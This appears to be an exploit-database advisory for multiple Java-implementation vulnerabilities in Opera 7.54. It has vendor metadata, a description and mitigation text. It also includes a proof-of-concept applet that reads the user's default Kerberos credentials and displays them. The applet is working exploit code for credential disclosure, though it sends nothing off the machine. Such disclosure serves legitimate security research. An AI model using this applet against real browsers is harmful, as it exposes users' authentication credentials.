header-logo
Suggest Exploit
vendor:
Opera Web Browser
by:
Unknown
7.5
CVSS
HIGH
Insecure proprietary design
494
CWE
Product Name: Opera Web Browser
Affected Version From: 7.54
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:opera:opera_web_browser:7.54
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux, Mac
Unknown

Remote vulnerabilities in Opera Web Browser Java implementation

The Opera Web Browser Java implementation has multiple remote vulnerabilities due to its insecure proprietary design. An attacker can craft a Java applet that violates Sun's Java secure programming guidelines. These vulnerabilities can be leveraged to carry out various attacks, including sensitive information disclosure and denial of service attacks. Successful exploitation would occur with the privileges of the user running the affected browser application.

Mitigation:

Update to a patched version of the Opera Web Browser that addresses the vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11712/info
  
Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation.
  
These issues may allow an attacker to craft a Java applet that violate Sun's Java secure programming guidelines.
  
These issues may be leveraged to carry out a variety of unspecified attacks including sensitive information disclosure and denial of service attacks. Any successful exploitation would take place with the privileges of the user running the affected browser application.
  
Although only version 7.54 is reportedly vulnerable, it is likely that earlier versions are vulnerable to these issues as well.

import sun.security.krb5.*;

public class Opera754KerberosAppletPrint extends java.applet.Applet{

   public void start() {

        int j =
javax.swing.JOptionPane.showConfirmDialog(null,"Illegalaccess.org | Step1
Opera 754 FontCrash, wanna crash? ");
        System.out.println(j);
        try {
        Credentials c =  Credentials.acquireDefaultCreds();

        System.out.println(c);
        j =
javax.swing.JOptionPane.showConfirmDialog(null,"Illegalaccess.org |Got
something for ya"+c);

        }
        catch (Exception e) {
        j = javax.swing.JOptionPane.showConfirmDialog(null,e.toString());

        }
   }

}